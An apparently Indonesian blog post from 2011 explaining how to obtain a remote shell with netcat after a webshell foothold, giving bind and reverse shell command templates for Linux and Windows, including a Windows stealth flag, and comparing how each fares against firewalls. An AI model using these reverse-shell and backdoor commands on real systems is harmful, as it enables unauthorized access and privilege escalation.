Sabtu, 19 November 2011

Remote Shell with NetCat

dalam melakukan proses previlege escalation, kita tidak bisa melakukan eksekusi langsung untuk melihat file /etc/passwd dan /etc/shadow atau mengeksekusi sebuah eksploit melewati sebuah webshell (shell yang dibuat dengan pemrograman web). maka dari itu, kita perlu mengupload sebuah shell backdoor agar mendapatkan shell secara interaktif.

tool yang sering digunakan untuk melakukan remote shell antara lain ssh(linux) atau telnet(windows) atau sebuah tool dari pihak ke tiga yaitu netcat (windows & linux). untuk windows, anda dapat mendapatkannya di sini, untuk linux biasanya telah terinstall waktu menginstall OS linux.

sebenarnya netcat memiliki banyak fungsi lain sehingga disebut swiss army knife karena kegunaanya. netcat dapat menjadi server maupun client (tapi netcat tidak peduli pada server maupun client) dapat melakukan bind mauupun reverse connection.

okelah... begini caranya melakukan bind connection

clientserver linuxserver windows
nc <ip server> <port> nc -l -v -p <port> -e /bin/sh nc -l -v -p <port> -d -e cmd.exe
dan untuk melakukan reverse connection
clientserver linuxserver windows
nc -l -v -p <port>nc <ip client> <port> -e /bin/bashnc <ip client> <port> -d -e cmd.exe
keterangan :

  • -d : stealth mode. khusus windows
  • -l : listen mode
  • -p : specify port untuk inbound connection
  • -v atau -vv : verbose (opsional)
  • -e : buka aplikasi setelah terkoneksi
pada awalnya saya juga bingung, bagaimana cara membedakan netcat sebagai server karena netcat tidak perduli dengan fungsi server atau client. namun saya telah menemukannya, anda harus memasukkan parameter -e agar kelanjutan setelah terkoneksi adalah membuka file tersebut sebagai shell (cmd atau sh)

karena banyak yang bertanya, akhirnya saya menjawab pertanyaan apa sih bedanya bind connection dengan reverse connection?. inilah bedanya :

bind :
merupakan metode koneksi dimana kita membuat koneksi ke komputer target melalui port yang telah dibuka oleh netcat. kelemahannya adalah masalah proteksi firewall yang mempunyai kebiasaan menutup port yang tertutup

reverse :
metode dimana kita berada pada posisi listening koneksi yang masuk, yang dibuat oleh target. kelebihannya adalahn rata-rata keberhasilan yang cukup tinggi karena tidak mendapat masalah firewall, namun kekurangannya, kita harus mendapatkan IP yang dapat diakses oleh publik agar netcat mengenali IP kita. namun lagi (:ngakak kebanyakan namun nih), fitur netcat terbaru yaitu gateway hopping dengan parameter "-g" dimana kita bisa mendapatkan gateway yang kita lalui dengan perintah "tracert <target>"". saya tidak yakin karena belum pernah mencoba cara ini :cendol

hehe... maaf nih kalo njelimet... kalau ada pertanyaan, silahkan tanyakan saja :jabat . semoga bermanfaat.

Posting Komentar

Give Ur eXPerience about this eXPerience...

Ads